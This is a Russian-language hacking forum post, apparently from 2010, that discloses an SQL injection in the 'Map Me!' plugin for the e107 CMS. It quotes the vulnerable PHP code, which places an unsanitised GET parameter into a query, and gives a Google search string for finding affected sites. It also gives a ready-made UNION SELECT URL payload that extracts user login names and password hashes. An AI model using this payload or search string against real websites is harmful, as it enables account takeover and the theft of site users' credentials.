02.05.2010, 14:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Map Me! v1.3 by rickey911
скачать
SQL inj
гугл- inurl:/e107_plugins/mapme
[path]/e107_plugins/mapme/mapmejs.php
PHP код:
...require_once("../../class2.php");
// Get language file (assume that the English language file is always present)
$lan_file = e_PLUGIN."mapme/languages/".e_LANGUAGE.".php";
include_lan($lan_file);
header("Content-type: application/x-javascript");
global $pref, $user;
$uid = $_GET['u'];
$sql->mySQLresult = @mysql_query("SELECT ".MPREFIX."gmarkers.loc, ".MPREFIX."gmarkers.lat, ".MPREFIX."gmarkers.lng, ".MPREFIX."user.user_name, ".MPREFIX."user.user_image FROM `".MPREFIX."gmarkers`, ".MPREFIX."user where ".MPREFIX."gmarkers.user_id = ".$uid." and ".MPREFIX."gmarkers.user_id = ".MPREFIX."user.user_id");
$rows=$sql->db_Rows();
if($rows){
$row = $sql->db_Fetch();
if($row['user_image']){
require_once(e_HANDLER."avatar_handler.php");
$uimage = "<img src='".avatar($row['user_image'])."' alt='".$row['user_name']."' style='text-align:middle' />";
}
else{
$uimage = "<img src='".e_PLUGIN."mapme/images/noavatar.gif' alt='".$row['user_name']."' style='text-align:middle' />";
}
$html = "\"<div style='width:250px;'><div style='float:left; text-align:left;'>".$uimage."</div><div style='float:left; text-align:left;'><a href='".e_BASE."user.php?id.".$uid."' title='".$row['user_name']."'><b>".$row['user_name']."</b></a><br>".MAPME_JS_001." ".$row['user_name']." ".MAPME_JS_002." ".$row['loc'].".";
if($uid==USERID){
$html .="<br><br><span class='smalltext'><a href='".e_PLUGIN_ABS."mapme/mapconfig.php'>".MAPME_JS_003."</a></span>"; // bugfix by nlstart
}
...
Результат и никаких условий:
http://[host]/[path]/e107_plugins/mapme/mapmejs.php?u=-1+union+select+1,2,3,concat_ws(0x3a,user_loginname ,user_password),5+from+e107_user--+
ps скоро буду ескплоиты на перл писать когда вылечусь ):
|
|
|